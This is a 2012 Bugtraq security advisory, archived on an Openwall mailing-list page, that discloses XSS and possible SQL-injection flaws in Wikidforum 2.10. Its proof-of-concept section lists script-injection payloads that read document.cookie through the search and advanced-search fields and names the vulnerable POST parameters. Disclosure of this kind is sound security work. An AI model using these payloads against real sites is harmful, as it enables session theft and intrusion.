| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
Message-Id: <201203101013.q2AADCGq011573@sf01web1.securityfocus.com> Date: Sat, 10 Mar 2012 10:13:12 GMT From: sschurtz@...ksecurity.de To: bugtraq@...urityfocus.com Subject: Wikidforum 2.10 Multiple security vulnerabilities Advisory: Wikidforum 2.10 Multiple security vulnerabilities Advisory ID: SSCHADV2012-005 Author: Stefan Schurtz Affected Software: Successfully tested on Wikidforum 2.10 Vendor URL: http://www.wikidforum.com/ Vendor Status: informed ========================== Vulnerability Description ========================== Wikidforum 2.10 is prone to multiple XSS and SQL-Injection vulnerabilities ================== PoC-Exploit ================== // xss Search-Field -> '"</script><script>alert(document.cookie)</script> Search-Field -> Advanced Search -> Author -> '"</script><script>alert(document.cookie)</script> Search-Field -> Advanced Search -> POST-Parameter 'select_sort' -> ><iMg src=N onerror=alert(document.cookie)> // possible SQL-Injection Search-Field -> Advanced Search -> POST-Parameter 'select_sort' -> [sql-injection] Search-Field -> Advanced Search -> POST-Parameter 'opt_search_select' -> [sql-injection] ========= Solution ========= - ==================== Disclosure Timeline ==================== 19-Feb-2012 - vendor informed 10-Mar-2012 - no response from vendor ======== Credits ======== Vulnerabilities found and advisory written by Stefan Schurtz. =========== References =========== http://www.darksecurity.de/advisories/2012/SSCHADV2012-005.txt
Powered by blists - more mailing lists